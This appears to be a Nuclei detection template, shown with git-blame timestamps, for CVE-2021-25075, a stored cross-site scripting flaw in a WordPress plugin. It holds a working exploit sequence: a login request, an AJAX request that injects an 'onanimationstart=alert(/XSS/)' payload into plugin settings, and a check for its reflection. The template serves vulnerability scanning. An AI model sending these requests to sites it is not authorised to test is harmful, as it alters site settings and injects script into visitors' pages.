2022-05-14 23:02:53 +00:00
id : CVE-2021-25075
info :
2022-08-29 13:55:23 +00:00
name : WordPress Duplicate Page or Post <1.5.1 - Cross-Site Scripting
2022-05-14 23:02:53 +00:00
author : DhiyaneshDK
2022-09-08 13:41:45 +00:00
severity : low
2022-05-14 23:02:53 +00:00
description : |
2022-08-29 13:55:23 +00:00
WordPress Duplicate Page or Post plugin before 1.5.1 contains a stored cross-site scripting vulnerability. The plugin does not have any authorization and has a flawed cross-site request forgery check in the wpdevart_duplicate_post_parametrs_save_in_db AJAX action, allowing unauthenticated users to call it and change the plugin's settings, or perform such attack via cross-site request forgery.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:09:01 +00:00
remediation : Fixed in version 1.5.1.
2022-05-14 23:02:53 +00:00
reference :
- https://wpscan.com/vulnerability/db5a0431-af4d-45b7-be4e-36b6c90a601b
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25075
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-25075
2022-05-14 23:03:15 +00:00
classification :
2022-08-30 18:11:00 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
cvss-score : 3.5
2022-08-29 20:34:27 +00:00
cve-id : CVE-2021-25075
2022-08-30 18:11:00 +00:00
cwe-id : CWE-862
2023-10-14 11:27:55 +00:00
epss-score : 0.00071
2024-01-14 13:49:27 +00:00
epss-percentile : 0.29136
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:wpdevart:duplicate_page_or_post:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : wpdevart
product : duplicate_page_or_post
2023-09-06 12:09:01 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,wpscan,wordpress,xss,wp-plugin,authenticated,wpdevart
2022-05-14 23:02:53 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-14 23:02:53 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
action=wpdevart_duplicate_post_parametrs_save_in_db&title_prefix=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2fXSS%2f%29+p
- |
GET /wp-admin/admin.php?page=wpda_duplicate_post_menu HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body
words :
- "style=animation-name:rotation onanimationstart=alert(/XSS/) p"
- "toplevel_page_wpda_duplicate_post_menu"
2022-05-14 23:18:52 +00:00
condition : and
2022-05-14 23:02:53 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a0047304502203c34c1506e12bcfb2a9768abb3ee16b6fe3289ca8482cfeaed615a73aa278b60022100cc0bae242a4927aff02a25f8cd0241409d24be052711f17df0f31f65ce07d6fa:922c64590222798bb761d5b6d8e72950
